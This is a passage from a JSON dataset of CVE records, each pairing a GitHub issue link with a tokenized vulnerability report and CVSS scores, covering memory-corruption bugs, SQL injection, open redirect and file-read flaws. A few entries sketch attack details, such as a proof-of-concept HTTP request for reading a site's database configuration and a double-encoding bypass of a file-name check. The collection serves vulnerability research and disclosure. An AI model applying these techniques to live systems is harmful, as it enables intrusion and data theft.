  67097. "Issue_Url_old": "https://github.com/drbye78/libgig/issues/1",
  67098. "Issue_Url_new": "https://github.com/drbye78/libgig/issues/1",
  67099. "Repo_new": "drbye78/libgig",
  67100. "Issue_Created_At": "2020-08-15T14:27:18Z",
  67101. "description": "A heap buffer overflow in APITAG The User account creation has been disabled in Bugzilla, so I have to report it here. System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), gigextract (latest master NUMBERTAG fd8 URLTAG Command line PATHTAG APITAG /tmp/libgig APITAG output ERRORTAG POC FILETAG",
  67102. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  67103. "severity": "HIGH",
  67104. "baseScore": 8.8,
  67105. "impactScore": 5.9,
  67106. "exploitabilityScore": 2.8
  67107. },
  67108. {
  67109. "CVE_ID": "CVE-2021-32297",
  67110. "Issue_Url_old": "https://github.com/lief-project/LIEF/issues/449",
  67111. "Issue_Url_new": "https://github.com/lief-project/lief/issues/449",
  67112. "Repo_new": "lief-project/lief",
  67113. "Issue_Created_At": "2020-08-07T13:04:22Z",
  67114. "description": "A heap overflow in APITAG (not issue in the library). System info Ubuntu NUMBERTAG gcc, pe_reader (latest master NUMBERTAG bbe NUMBERTAG URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG APITAG APITAG output ERRORTAG POC FILETAG",
  67115. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  67116. "severity": "HIGH",
  67117. "baseScore": 8.8,
  67118. "impactScore": 5.9,
  67119. "exploitabilityScore": 2.8
  67120. },
  67121. {
  67122. "CVE_ID": "CVE-2021-32298",
  67123. "Issue_Url_old": "https://github.com/svanderburg/libiff/issues/10",
  67124. "Issue_Url_new": "https://github.com/svanderburg/libiff/issues/10",
  67125. "Repo_new": "svanderburg/libiff",
  67126. "Issue_Created_At": "2020-08-04T06:53:28Z",
  67127. "description": "A global buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), iffpp (latest master NUMBERTAG be4 URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG APITAG Output APITAG output ERRORTAG POC FILETAG",
  67128. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  67129. "severity": "HIGH",
  67130. "baseScore": 8.8,
  67131. "impactScore": 5.9,
  67132. "exploitabilityScore": 2.8
  67133. },
  67134. {
  67135. "CVE_ID": "CVE-2021-32299",
  67136. "Issue_Url_old": "https://github.com/mmp/pbrt-v3/issues/296",
  67137. "Issue_Url_new": "https://github.com/mmp/pbrt-v3/issues/296",
  67138. "Repo_new": "mmp/pbrt-v3",
  67139. "Issue_Created_At": "2020-08-04T08:57:10Z",
  67140. "description": "A stack buffer overflow in APITAG with default test case. System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), pbrt (latest master aaa NUMBERTAG URLTAG Configure cmake ../srcs DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG quick PATHTAG outfile /tmp/pbrt APITAG output ERRORTAG POC FILETAG",
  67141. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  67142. "severity": "HIGH",
  67143. "baseScore": 7.8,
  67144. "impactScore": 5.9,
  67145. "exploitabilityScore": 1.8
  67146. },
  67147. {
  67148. "CVE_ID": "CVE-2021-3242",
  67149. "Issue_Url_old": "https://github.com/duxphp/DuxCMS3/issues/4",
  67150. "Issue_Url_new": "https://github.com/duxphp/duxcms3/issues/4",
  67151. "Repo_new": "duxphp/duxcms3",
  67152. "Issue_Created_At": "2021-01-17T02:07:36Z",
  67153. "description": "backend sql injection vulnerability. sql injection vulnerability exists in tools APITAG module, url is PATHTAG please check FILETAG NUMBERTAG more details in URLTAG",
  67154. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  67155. "severity": "CRITICAL",
  67156. "baseScore": 9.8,
  67157. "impactScore": 5.9,
  67158. "exploitabilityScore": 3.9
  67159. },
  67160. {
  67161. "CVE_ID": "CVE-2021-32434",
  67162. "Issue_Url_old": "https://github.com/leesavide/abcm2ps/issues/83",
  67163. "Issue_Url_new": "https://github.com/lewdlime/abcm2ps/issues/83",
  67164. "Repo_new": "lewdlime/abcm2ps",
  67165. "Issue_Created_At": "2021-04-27T02:14:17Z",
  67166. "description": "Out of bounds read in APITAG in calculate_beam. In function APITAG in draw.c . There is out of bounds read in array min_tb at line NUMBERTAG and NUMBERTAG the flaw will cause crash. ERRORTAG The (unsigned) s >nflags can be checked whether between NUMBERTAG and NUMBERTAG I am not sure what the APITAG means so i didn't try to fix it. gdb info: ERRORTAG reproduce: APITAG FILETAG FILETAG",
  67167. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67168. "severity": "MEDIUM",
  67169. "baseScore": 5.5,
  67170. "impactScore": 3.6,
  67171. "exploitabilityScore": 1.8
  67172. },
  67173. {
  67174. "CVE_ID": "CVE-2021-32435",
  67175. "Issue_Url_old": "https://github.com/leesavide/abcm2ps/issues/84",
  67176. "Issue_Url_new": "https://github.com/lewdlime/abcm2ps/issues/84",
  67177. "Repo_new": "lewdlime/abcm2ps",
  67178. "Issue_Created_At": "2021-04-27T03:41:52Z",
  67179. "description": "stack buffer overflow in function APITAG in parse.c. Stack buffer over found in parse.c in function APITAG The root cause maybe is in function APITAG the array accs and pits size is NUMBERTAG If APITAG bigger than NUMBERTAG then the array accs and pits will access out of index and corrupt the stack, if the value of APITAG is more bigger, then the stack frame will be corrupted. CODETAG gdb APITAG gef\u27a4 disassemble set_k_acc Dump of assembler code for function set_k_acc NUMBERTAG f NUMBERTAG c APITAG : endbr NUMBERTAG f NUMBERTAG APITAG : push rbp NUMBERTAG f NUMBERTAG APITAG : mov rbp,rsp NUMBERTAG f NUMBERTAG APITAG : sub rsp NUMBERTAG f NUMBERTAG APITAG : mov QWORD PTR [rbp NUMBERTAG rdi NUMBERTAG f NUMBERTAG APITAG mov rax, QWORD PTR [rbp NUMBERTAG f NUMBERTAG APITAG xor rax, QWORD PTR fs NUMBERTAG f NUMBERTAG e APITAG je NUMBERTAG f NUMBERTAG APITAG NUMBERTAG f NUMBERTAG APITAG call NUMBERTAG ba NUMBERTAG APITAG NUMBERTAG f NUMBERTAG APITAG leave \u2500 APITAG NUMBERTAG for (i NUMBERTAG i APITAG u. APITAG = accs[i NUMBERTAG s >u. APITAG = pits[i NUMBERTAG s >u. APITAG = nacc NUMBERTAG gef\u27a4 x/gx $rbp NUMBERTAG fffffffe NUMBERTAG gef\u27a4 p $fs NUMBERTAG",
  67180. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67181. "severity": "MEDIUM",
  67182. "baseScore": 5.5,
  67183. "impactScore": 3.6,
  67184. "exploitabilityScore": 1.8
  67185. },
  67186. {
  67187. "CVE_ID": "CVE-2021-32436",
  67188. "Issue_Url_old": "https://github.com/leesavide/abcm2ps/issues/85",
  67189. "Issue_Url_new": "https://github.com/lewdlime/abcm2ps/issues/85",
  67190. "Repo_new": "lewdlime/abcm2ps",
  67191. "Issue_Created_At": "2021-04-27T07:57:56Z",
  67192. "description": "out of bounds read in function APITAG in subs.c. Out of bounds read found in function APITAG in subs.c. The flow allows attackers to cause denial of service. Here didn't check whether APITAG is valid . gdb info: ERRORTAG reproduce : (poc zipped ) ERRORTAG FILETAG",
  67193. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67194. "severity": "MEDIUM",
  67195. "baseScore": 6.5,
  67196. "impactScore": 3.6,
  67197. "exploitabilityScore": 2.8
  67198. },
  67199. {
  67200. "CVE_ID": "CVE-2021-32437",
  67201. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1770",
  67202. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1770",
  67203. "Repo_new": "gpac/gpac",
  67204. "Issue_Created_At": "2021-04-30T08:10:59Z",
  67205. "description": "Null pointer dereference in function gf_hinter_finalize APITAG A null pointer dereference issue was found in APITAG to reproduce, compile gpac as follows: APITAG run poc file : APITAG Detailed ASAN result is as below: ERRORTAG Credit : APITAG of Venustech FILETAG",
  67206. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67207. "severity": "MEDIUM",
  67208. "baseScore": 5.5,
  67209. "impactScore": 3.6,
  67210. "exploitabilityScore": 1.8
  67211. },
  67212. {
  67213. "CVE_ID": "CVE-2021-32438",
  67214. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1769",
  67215. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1769",
  67216. "Repo_new": "gpac/gpac",
  67217. "Issue_Created_At": "2021-04-30T08:03:06Z",
  67218. "description": "Null pointer dereference in gpac APITAG gf_media_export_filters. A null pointer dereference issue was found in APITAG to reproduce, compile gpac as follows: APITAG run poc file : APITAG Detailed ASAN result is as below: ERRORTAG Credit : APITAG of Venustech FILETAG",
  67219. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67220. "severity": "MEDIUM",
  67221. "baseScore": 5.5,
  67222. "impactScore": 3.6,
  67223. "exploitabilityScore": 1.8
  67224. },
  67225. {
  67226. "CVE_ID": "CVE-2021-32439",
  67227. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1774",
  67228. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1774",
  67229. "Repo_new": "gpac/gpac",
  67230. "Issue_Created_At": "2021-04-30T08:40:50Z",
  67231. "description": "Out of bounds Write in APITAG A OOB Write issue was found in APITAG to reproduce, compile gpac as follows: APITAG run poc file : APITAG Detailed ASAN result is as below: ERRORTAG Credit : APITAG of Venustech FILETAG",
  67232. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  67233. "severity": "HIGH",
  67234. "baseScore": 7.8,
  67235. "impactScore": 5.9,
  67236. "exploitabilityScore": 1.8
  67237. },
  67238. {
  67239. "CVE_ID": "CVE-2021-32440",
  67240. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1772",
  67241. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1772",
  67242. "Repo_new": "gpac/gpac",
  67243. "Issue_Created_At": "2021-04-30T08:25:12Z",
  67244. "description": "SEGV in gpac APITAG function APITAG A SEGV issue was found in APITAG to reproduce, compile gpac as follows: APITAG run poc file : APITAG Detailed ASAN result is as below: ERRORTAG Credit : APITAG of Venustech FILETAG",
  67245. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67246. "severity": "MEDIUM",
  67247. "baseScore": 5.5,
  67248. "impactScore": 3.6,
  67249. "exploitabilityScore": 1.8
  67250. },
  67251. {
  67252. "CVE_ID": "CVE-2021-3246",
  67253. "Issue_Url_old": "https://github.com/libsndfile/libsndfile/issues/687",
  67254. "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/687",
  67255. "Repo_new": "libsndfile/libsndfile",
  67256. "Issue_Created_At": "2021-01-15T10:43:55Z",
  67257. "description": "heap buffer overflow in in msadpcm_decode_block. Hi, I found a heap buffer overflow in in msadpcm_decode_block PATHTAG I'm on an NUMBERTAG Ubuntu NUMBERTAG with Clang NUMBERTAG The APITAG report is the following: ERRORTAG To reproduce on git master: CODETAG The testcase that triggers the bug is (decompress it before): FILETAG",
  67258. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  67259. "severity": "HIGH",
  67260. "baseScore": 8.8,
  67261. "impactScore": 5.9,
  67262. "exploitabilityScore": 2.8
  67263. },
  67264. {
  67265. "CVE_ID": "CVE-2021-32546",
  67266. "Issue_Url_old": "https://github.com/gogs/gogs/issues/6555",
  67267. "Issue_Url_new": "https://github.com/gogs/gogs/issues/6555",
  67268. "Repo_new": "gogs/gogs",
  67269. "Issue_Created_At": "2021-05-10T15:04:02Z",
  67270. "description": "Remote Command Execution. Hello, we are security researchers from Unicorn ( URLTAG and we have identified a serious vulnerability that is exploitable from the position of a registered user. The vulnerability allows the Remote Command Execution, leading to full server takeover. The details will be sent to FILETAG as requested. Regards, Marek Malcovsk\u00fd & Petr Pernik\u00e1\u0159",
  67271. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  67272. "severity": "HIGH",
  67273. "baseScore": 8.8,
  67274. "impactScore": 5.9,
  67275. "exploitabilityScore": 2.8
  67276. },
  67277. {
  67278. "CVE_ID": "CVE-2021-32559",
  67279. "Issue_Url_old": "https://github.com/mhammond/pywin32/issues/1700",
  67280. "Issue_Url_new": "https://github.com/mhammond/pywin32/issues/1700",
  67281. "Repo_new": "mhammond/pywin32",
  67282. "Issue_Created_At": "2021-05-11T20:56:14Z",
  67283. "description": "Integer overflow in APITAG Context When an ACL is resized to add an ACE, it is possible to craft an integer overflow targeting the calculated\u202f APITAG . This results in a smaller than required buffer allocation which causes its\u202f memcpy \u202fof the ACL data to result in a heap overflow. Expected behavior and actual behavior Expected Behavior: Throw an exception indicating that the ACE could not be added because there is not enough room left in the ACL before hitting the size limit. Actual Behavior: The\u202f APITAG \u202fis overflowed and the\u202f memcpy \u202fresults in a heap overflow. Steps to reproduce the problem This was reproduced by adding roughly NUMBERTAG ACEs to an ACL. The exact count of ACEs that need to be added before reproducing the issue will vary based on the length of the SID in the ACE entry and the current size of the ACL being modified. Reproduction Goal: Add an ACE to an ACL such that the new size would be larger than\u202f APITAG . Version of Python and pywin NUMBERTAG Tested on Python NUMBERTAG with pywin NUMBERTAG b NUMBERTAG Appears to effect version b NUMBERTAG through b NUMBERTAG CVE CVETAG APITAG",
  67284. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  67285. "severity": "MEDIUM",
  67286. "baseScore": 6.5,
  67287. "impactScore": 3.6,
  67288. "exploitabilityScore": 2.8
  67289. },
  67290. {
  67291. "CVE_ID": "CVE-2021-3256",
  67292. "Issue_Url_old": "https://github.com/poropro/kuaifan/issues/3",
  67293. "Issue_Url_new": "https://github.com/poropro/kuaifan/issues/3",
  67294. "Repo_new": "poropro/kuaifan",
  67295. "Issue_Created_At": "2021-01-13T08:41:16Z",
  67296. "description": "Arbitrary file read vulnerability in the html_url parameter of the FILETAG . Hello, I found that there is a Arbitrary file read vulnerability in the html_url parameter of the FILETAG file on the website. The html_url parameter is not filtered for dangerous characters, resulting in a vulnerability. FILETAG Read the database configuration file through the vulnerability FILETAG FILETAG poc : POST APITAG &vs NUMBERTAG c=chakanhtml&a=index HTTP NUMBERTAG Host: kuaifan.com User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Accept Encoding: gzip, deflate Content Type: application/x www form urlencoded Content Length NUMBERTAG Referer: URLTAG Cookie: APITAG APITAG APITAG APITAG APITAG APITAG APITAG UM_distinctid NUMBERTAG aa0c7f NUMBERTAG b NUMBERTAG d9b NUMBERTAG a7a NUMBERTAG d4a NUMBERTAG aa0c7f NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG",
  67297. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  67298. "severity": "MEDIUM",
  67299. "baseScore": 6.5,
  67300. "impactScore": 3.6,
  67301. "exploitabilityScore": 2.8
  67302. },
  67303. {
  67304. "CVE_ID": "CVE-2021-32613",
  67305. "Issue_Url_old": "https://github.com/radareorg/radare2/issues/18679",
  67306. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/18679",
  67307. "Repo_new": "radareorg/radare2",
  67308. "Issue_Created_At": "2021-05-11T12:22:26Z",
  67309. "description": "Heap memory bugs on pyc parse. Environment ERRORTAG Description APITAG While I am fuzzing rabin2 with I parameter, I am encountered several heap memory bugs with the same file on different sanitizers. I assume that if nested pyc magic byte NUMBERTAG is occured in file, radare2 tries to parse and does memory operations more than once and heap memory bugs are triggered. While ASAN throws heap use after free error on r_bin_object_set_items, MSAN and vanilla run throws double free error. This will lead seperate bugs both on r_bin_filter_name and r_bin_object_set_items . With ASAN: ERRORTAG With MSAN: ERRORTAG Without sanitizer: ERRORTAG Although, When I will test it with nested NUMBERTAG with no following bytes, It runs normally. ERRORTAG FILETAG It is failing with additional bytes after nested magic byte. FILETAG Test APITAG You can find files mentioned above in this zip file. FILETAG",
  67310. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67311. "severity": "MEDIUM",
  67312. "baseScore": 5.5,
  67313. "impactScore": 3.6,
  67314. "exploitabilityScore": 1.8
  67315. },
  67316. {
  67317. "CVE_ID": "CVE-2021-32615",
  67318. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1410",
  67319. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1410",
  67320. "Repo_new": "piwigo/piwigo",
  67321. "Issue_Created_At": "2021-05-13T10:37:45Z",
  67322. "description": "NUMBERTAG user manager] SQL injection. As reported by Harry Goodman from NCC Group: > The \u2018order NUMBERTAG dir]\u2019 parameter in FILETAG is vulnerable to SQL injection > > I believe this is because of the following pieces of code: CODETAG > I would suggest either using the check_inputs function that your application seems to rely on, or depending on how much functionality is needed, just do a check to ensure the parameter is either ASC or DESC. > > CVETAG",
  67323. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  67324. "severity": "CRITICAL",
  67325. "baseScore": 9.8,
  67326. "impactScore": 5.9,
  67327. "exploitabilityScore": 3.9
  67328. },
  67329. {
  67330. "CVE_ID": "CVE-2021-32618",
  67331. "Issue_Url_old": "https://github.com/Flask-Middleware/flask-security/issues/486",
  67332. "Issue_Url_new": "https://github.com/flask-middleware/flask-security/issues/486",
  67333. "Repo_new": "flask-middleware/flask-security",
  67334. "Issue_Created_At": "2021-05-17T01:18:29Z",
  67335. "description": "Open Redirect Vulnerability. It has been reported that FS (all versions) have an open redirect vulnerabilty. This is due to a combination of FS not doing complete checking of whether a redirect URL is relative or absolute, and modern browsers willing to 'fill in the blanks' for slightly malformed URLs. Thus a URL of the form: FILETAG will cause many browsers to redirect to github.com after a successful login to your app. However by default, Werkzeug auto corrects Location headers to always be absolute so this vulnerability doesn't exist for many (most?) applications.",
  67336. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  67337. "severity": "MEDIUM",
  67338. "baseScore": 6.1,
  67339. "impactScore": 2.7,
  67340. "exploitabilityScore": 2.8
  67341. },
  67342. {
  67343. "CVE_ID": "CVE-2021-32630",
  67344. "Issue_Url_old": "https://github.com/Admidio/admidio/issues/994",
  67345. "Issue_Url_new": "https://github.com/admidio/admidio/issues/994",
  67346. "Repo_new": "admidio/admidio",
  67347. "Issue_Created_At": "2021-01-23T18:35:40Z",
  67348. "description": "Authenticated local file inclusion possible. Authenticated Local File Inclusion. Need admin or upload permissions. Someone with upload permissions can use the move to db ability to \"get\" local files and move to the Documents & Folders view. The mitigation to block \"/\" from file names works, but if you double encode it, it bypasses the check...",
  67349. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  67350. "severity": "HIGH",
  67351. "baseScore": 8.8,
  67352. "impactScore": 5.9,
  67353. "exploitabilityScore": 2.8
  67354. },
  67355. {
  67356. "CVE_ID": "CVE-2021-3264",
  67357. "Issue_Url_old": "https://github.com/cbkhwx/cxuucmsv3/issues/6",
  67358. "Issue_Url_new": "https://github.com/cbkhwx/cxuucmsv3/issues/6",
  67359. "Repo_new": "cbkhwx/cxuucmsv3",
  67360. "Issue_Created_At": "2021-01-20T03:02:50Z",
  67361. "description": "SQL injection vulnerability exists in FILETAG file. An SQL injection vulnerability exists in the front end FILETAG page You need to log in to admin before SQL injection. exp1: URLTAG Verify screenshot FILETAG exp2: URLTAG Verify screenshot FILETAG",
  67362. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  67363. "severity": "HIGH",
  67364. "baseScore": 7.2,
  67365. "impactScore": 5.9,
  67366. "exploitabilityScore": 1.2
  67367. },
  67368. {
  67369. "CVE_ID": "CVE-2021-32640",
  67370. "Issue_Url_old": "https://github.com/websockets/ws/issues/1895",
  67371. "Issue_Url_new": "https://github.com/websockets/ws/issues/1895",
  67372. "Repo_new": "websockets/ws",
  67373. "Issue_Created_At": "2021-06-01T15:04:05Z",
  67374. "description": "Backport Security Fix to NUMBERTAG APITAG [x] I've searched for any related issues and avoided creating a duplicate issue. Description Any chances the security fix patch URLTAG could be backported to NUMBERTAG to release a NUMBERTAG with the fix? Webpack dev server currently uses NUMBERTAG which has caused a flagged security issue in a lot of repos that can't be fixed until people can upgrade to the not yet stable webpack dev server NUMBERTAG URLTAG APITAG we are using webpack dev server as a dependency of react scrips so it will probably be a long time before react scripts updates to webpack dev server NUMBERTAG Admittedly being a dev server, this is (hopefully) only local, but it would be nice not to have a security alert stuck on our github repository. Reproducible in: version NUMBERTAG FILETAG version(s): OS version(s): Steps to reproduce NUMBERTAG Install webpack dev server Expected result: No security issue Actual result: Flagged security issues",
  67375. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  67376. "severity": "MEDIUM",
  67377. "baseScore": 5.3,
  67378. "impactScore": 1.4,
  67379. "exploitabilityScore": 3.9
  67380. },
  67381. {
  67382. "CVE_ID": "CVE-2021-32670",
  67383. "Issue_Url_old": "https://github.com/simonw/datasette/issues/1360",
  67384. "Issue_Url_new": "https://github.com/simonw/datasette/issues/1360",
  67385. "Repo_new": "simonw/datasette",
  67386. "Issue_Created_At": "2021-06-05T21:53:51Z",
  67387. "description": "Security flaw, to be fixed in NUMBERTAG and NUMBERTAG Details to follow after the patch has been released.",
  67388. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  67389. "severity": "MEDIUM",
  67390. "baseScore": 6.1,
  67391. "impactScore": 2.7,
  67392. "exploitabilityScore": 2.8
  67393. },
  67394. {
  67395. "CVE_ID": "CVE-2021-3272",
  67396. "Issue_Url_old": "https://github.com/jasper-software/jasper/issues/259",
  67397. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/259",
  67398. "Repo_new": "jasper-software/jasper",
  67399. "Issue_Created_At": "2021-01-06T05:48:40Z",
  67400. "description": "Heap buffer overflow in PATHTAG I found a heap buffer overflow vulnerability in the current master branch (release version NUMBERTAG poc file : FILETAG ASAN report \u279c appl git:(master) \u2717 ./jasper input PATHTAG output test.jp2 warning: not enough tile data NUMBERTAG bytes) warning: bad segmentation symbol warning: bad segmentation symbol warning: bad segmentation symbol warning: bad segmentation symbol warning: component data type mismatch APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f8 at pc NUMBERTAG f NUMBERTAG ad NUMBERTAG be bp NUMBERTAG fffbeaa2a NUMBERTAG sp NUMBERTAG fffbeaa2a NUMBERTAG READ of size NUMBERTAG at NUMBERTAG f8 thread T NUMBERTAG f NUMBERTAG ad NUMBERTAG bd in jp2_decode PATHTAG NUMBERTAG f NUMBERTAG ad NUMBERTAG in jas_image_decode PATHTAG NUMBERTAG f8d NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG bde NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG NUMBERTAG f8 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG c NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG ad NUMBERTAG c8 in jas_malloc PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in jp2_decode Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fa fa fa fd fa fa fa fd fd fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fd fd fa fa fd fd fa fa fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fa fa fd fd fa fa fd fa fa fa fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fa fa fa fd fa fa fa fd fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING",
  67401. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67402. "severity": "MEDIUM",
  67403. "baseScore": 5.5,
  67404. "impactScore": 3.6,
  67405. "exploitabilityScore": 1.8
  67406. },
  67407. {
  67408. "CVE_ID": "CVE-2021-32823",
  67409. "Issue_Url_old": "https://github.com/rubysec/ruby-advisory-db/issues/476",
  67410. "Issue_Url_new": "https://github.com/rubysec/ruby-advisory-db/issues/476",
  67411. "Repo_new": "rubysec/ruby-advisory-db",
  67412. "Issue_Created_At": "2021-06-01T21:41:34Z",
  67413. "description": "Add advisory for bindata. Potential APITAG which was fixed in URLTAG as part of bindata NUMBERTAG No CVE yet",
  67414. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
  67415. "severity": "LOW",
  67416. "baseScore": 3.7,
  67417. "impactScore": 1.4,
  67418. "exploitabilityScore": 2.2
  67419. },
  67420. {
  67421. "CVE_ID": "CVE-2021-32838",
  67422. "Issue_Url_old": "https://github.com/python-restx/flask-restx/issues/372",
  67423. "Issue_Url_new": "https://github.com/python-restx/flask-restx/issues/372",
  67424. "Repo_new": "python-restx/flask-restx",
  67425. "Issue_Created_At": "2021-08-31T17:26:29Z",
  67426. "description": "GHSL NUMBERTAG Hello, The FILETAG has found a potential vulnerability in your project. Please create a Security Advisory URLTAG and invite me in to further disclose and discuss the vulnerability details and potential fix. Alternatively, please add a Security Policy URLTAG containing a security email address to send the details to. If you prefer to contact us by email, please reach out to EMAILTAG with reference to GHSL NUMBERTAG Thank you, Kevin Backhouse APITAG Security Lab",
  67427. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  67428. "severity": "HIGH",
  67429. "baseScore": 7.5,
  67430. "impactScore": 3.6,
  67431. "exploitabilityScore": 3.9
  67432. },
  67433. {
  67434. "CVE_ID": "CVE-2021-32849",
  67435. "Issue_Url_old": "https://github.com/Gerapy/Gerapy/issues/197",
  67436. "Issue_Url_new": "https://github.com/gerapy/gerapy/issues/197",
  67437. "Repo_new": "gerapy/gerapy",
  67438. "Issue_Created_At": "2021-05-14T12:11:59Z",
  67439. "description": "APITAG Security Lab: Security Contact Needed. Hello, The FILETAG has found a potential vulnerability in your project. Please create a Security Advisory URLTAG and invite me in to further disclose and discuss the vulnerability details and potential fix. Alternatively, please add a Security Policy URLTAG containing a security email address to send the details to. If you prefer to contact us by email, please reach out to EMAILTAG with reference to APITAG . Thank you, Agustin Gianni APITAG Security Lab",
  67440. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  67441. "severity": "HIGH",
  67442. "baseScore": 8.8,
  67443. "impactScore": 5.9,
  67444. "exploitabilityScore": 2.8
  67445. },
  67446. {
  67447. "CVE_ID": "CVE-2021-32849",
  67448. "Issue_Url_old": "https://github.com/Gerapy/Gerapy/issues/217",
  67449. "Issue_Url_new": "https://github.com/gerapy/gerapy/issues/217",
  67450. "Repo_new": "gerapy/gerapy",
  67451. "Issue_Created_At": "2021-11-22T09:05:04Z",
